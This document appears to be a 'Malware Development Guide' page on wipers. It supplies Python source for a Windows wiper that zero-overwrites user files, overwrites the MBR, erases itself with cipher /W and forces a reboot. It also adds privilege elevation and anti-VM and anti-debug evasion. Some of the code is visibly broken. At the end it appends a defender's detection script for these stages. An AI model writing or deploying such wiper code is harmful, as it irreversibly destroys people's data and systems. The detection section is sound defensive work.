Malware Development Guide

Wipers

Last updated 2 years ago

A wiper is a class of malware intended to erase (wipe, hence the name) the hard drive of the computer it infects, maliciously deleting data and programs.

Simply put, a wiper just straight up removes EVERYTHING on a system, thus "disabling" the system. I found an awesome article by @0xf00I that I'll be using as my main reference for this. This malware works in 4 primary stages:

  1. Destroy file contents
  2. Destroy the MBR
  3. Remove self
  4. Shut it down!

Let's look at a simple Python wiper. Assuming you've got a rootkit to pack with this sucker, here's a simple program to wipe everything off a Windows system:

import os 
import subprocess
import ctypes
from ctypes import wintypes
import win32api


startupinfo = subprocess.STARTUPINFO() #type: ignore 
drives = win32api.GetLogicalDriveStrings()
kernel32 = ctypes.WinDLL('kernel32')


def OverWriteMBR(): 
    hDevice = Kernel32.CreateFileW("\\\\.\\PhysicalDrive0", 0x40000000, 0x00000001 | 0x00000002, None, 3, 0,0) # Create a handle to our Physical Drive
    Kernel32.WriteFile(hDevice, Data, None) # Overwrite the MBR! (Never run this on your main machine!)
    Kernel32.CloseHandle(hDevice) # Close the handle to our Physical Drive!
    
def SetFiles():
    ext = [
           ".m2ts", ".mkv", ".mov", ".mp4", ".mpg", ".mpeg",
           ".rm", ".swf", ".vob", ".wmv" ".docx", ".pdf",".rar",
           ".jpg", ".jpeg", ".png", ".tiff", ".zip", ".7z", 
           ".tar.gz", ".tar", ".mp3", ".sh", ".c", ".cpp", ".h", 
           ".gif", ".txt", ".jar", ".sql", ".bundle",
           ".sqlite3", ".html", ".php", ".log", ".bak", ".deb"] # files to seek out and overwrite
    for dirpath, dirs, files in os.walk(f"C:\\Users\\{os.getlogin()}\\{os.getcwd()}"): 
        for f in files:
            path = os.path.abspath(os.path.join(dirpath, f))
            if f.endswith(tuple(ext)): 
                with open(f, "rb") as files:
                    data = files.read()
                    files.close()
                    with open(f, "wb") as files:
                        data.write(b'\x00') # Overwrites multiple files with zero bytes (hex 00)
                        data.close()                             


def SysDown():
    # InitiateSystemShutdown()  
    os.system("shutdown -t 0 -r -f ") 

def main():
        global application_path 
        if getattr(sys, 'frozen', False):
            application_path = sys.executable
        else:
            application_path = os.path.dirname(os.path.abspath(__file__))

            SetFiles()
            OverWriteMBR()
if __name__ == "__main__":
    main()
    SysDown()

Simple as that! Run this as admin and it'll remove everything including the MBR. Neat, right? Well, it's not very effective, but you can add a whole bunch of stuff to make it even better! (I'll once again be yoinking some code from the exalted @0xf00I's skywiper repo...)

For example, you can add a checking mechanism that checks if the program is being run with elevated privileges:

def IsAdmin():
    """ it checks if it has Administrator privileges, if it doesn't it runs itself using the ShellExecute trick and exits immediately
        if it does, it performs the task at hand. """
    try:
        return ctypes.windll.shell32.IsUserAnAdmin()
    except:
        return False

Maybe some function to run the thing as admin:

def RunAsAdmin():
    ctypes.windll.shell32.IsUserAnAdmin() or (ctypes.windll.shell32.ShellExecuteW(
        None, "runas", sys.executable, " ".join(sys.argv), None, 1) > 32, sys.exit())

Some anti-debug/anti-VM magic never goes wrong:

def AntiVm():
      Process = ["vmsrvc.exe" , "vmusrvc.exe", "vboxtray.exe", "vmtoolsd.exe", "df5serv.exe", "vboxservice.exe"]
      for process in psutil.process_iter():
         for i in Process:
            if i in process.name().lower():
                return CommitSuicide()

def AntiDebug():
    isDebuggerPresent = windll.kernel32.IsDebuggerPresent()
    if (isDebuggerPresent):
        return CommitSuicide()

def CommitSuicide():
    file_path = os.path.abspath(__file__)
    os.remove(file_path)
    folder_path = os.path.dirname(file_path)
    os.system("cipher /W:%s" % folder_path) # At the end of the script, the file is deleted & over-written

You can include calls to all this stuff in the main() function and you'll have an even better wiper! Alas, good wipers are far too complicated, and it's best if I leave it here. I'll try to make one such and put it up here in the future (no guarantees though!). Please feel free to reach out and ask about this stuff if you need to~

References
https://github.com/golang/go/wiki/WindowsDLLs
https://pkg.go.dev/syscall#pkg-index
https://anubissec.github.io/How-To-Call-Windows-APIs-In-Golang/#
https://justen.codes/breaking-all-the-rules-using-go-to-call-windows-api-2cbfd8c79724
https://www.thesubtlety.com/post/getting-started-golang-windows-apis/
https://0x00sec.org/t/python-and-malware-writing-a-simple-wiper-malware/31652
https://learn.microsoft.com/en-us/windows/win32/apiindex/windows-api-list
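A defender's counterpart to the four stages described on this page, as an added example that is not part of the original page or 0xf00I's code: it scans constructed telemetry (event types, process names and paths are all assumptions made up for this example) and only flags a process that chains several of the stages (mass overwrite of user documents, a raw write handle on PhysicalDrive0, cipher /W self-wiping, a forced reboot), so a document editor or a lone reboot does not trip it.

```python
import re
from collections import Counter, defaultdict

# Constructed sample telemetry (not real logs): (event_type, process, detail).
# Event types are assumptions for this example: "file_write" (detail = path),
# "raw_disk_open" (device opened for writing), "proc_create" (command line).
SAMPLE_EVENTS = [
    ("file_write",    "updater.exe",  r"C:\Users\alice\Documents\report.docx"),
    ("file_write",    "updater.exe",  r"C:\Users\alice\Pictures\holiday.jpg"),
    ("file_write",    "updater.exe",  r"C:\Users\alice\Desktop\notes.txt"),
    ("raw_disk_open", "updater.exe",  r"\\.\PhysicalDrive0"),
    ("proc_create",   "updater.exe",  r"cipher /W:C:\Users\alice\Downloads"),
    ("proc_create",   "updater.exe",  r"shutdown -t 0 -r -f"),
    ("file_write",    "winword.exe",  r"C:\Users\alice\Documents\report.docx"),
    ("proc_create",   "explorer.exe", r"notepad.exe C:\tmp\a.txt"),
]

# Subset of the extension list the wiper on this page targets.
USER_DOC_EXT = (".docx", ".pdf", ".jpg", ".jpeg", ".png", ".txt", ".zip", ".mp4")

# One rule per wiper stage that leaves a single, distinctive event.
STAGE_RULES = {
    "raw_mbr_write": lambda et, d: et == "raw_disk_open"
        and re.search(r"\\\\\.\\PhysicalDrive\d", d, re.I) is not None,
    "self_wipe_cipher": lambda et, d: et == "proc_create"
        and re.search(r"\bcipher(\.exe)?\s+/W:", d, re.I) is not None,
    "forced_reboot": lambda et, d: et == "proc_create"
        and re.search(r"\bshutdown(\.exe)?\b.*\s-f\b", d, re.I) is not None,
}

def score_processes(events, mass_threshold=3):
    """Map each process to the set of wiper stages it exhibited."""
    stages = defaultdict(set)
    doc_writes = Counter()
    for etype, proc, detail in events:
        if etype == "file_write" and detail.lower().endswith(USER_DOC_EXT):
            doc_writes[proc] += 1  # stage 1 is only suspicious in volume
        for name, rule in STAGE_RULES.items():
            if rule(etype, detail):
                stages[proc].add(name)
    for proc, n in doc_writes.items():
        if n >= mass_threshold:
            stages[proc].add("mass_user_file_overwrite")
    return dict(stages)

def wiper_verdict(events, min_stages=2):
    """Flag only processes chaining at least min_stages distinct stages."""
    return {p: sorted(s) for p, s in score_processes(events).items()
            if len(s) >= min_stages}
```

On the sample above only updater.exe is flagged, with all four stages; winword.exe writes one document and is ignored.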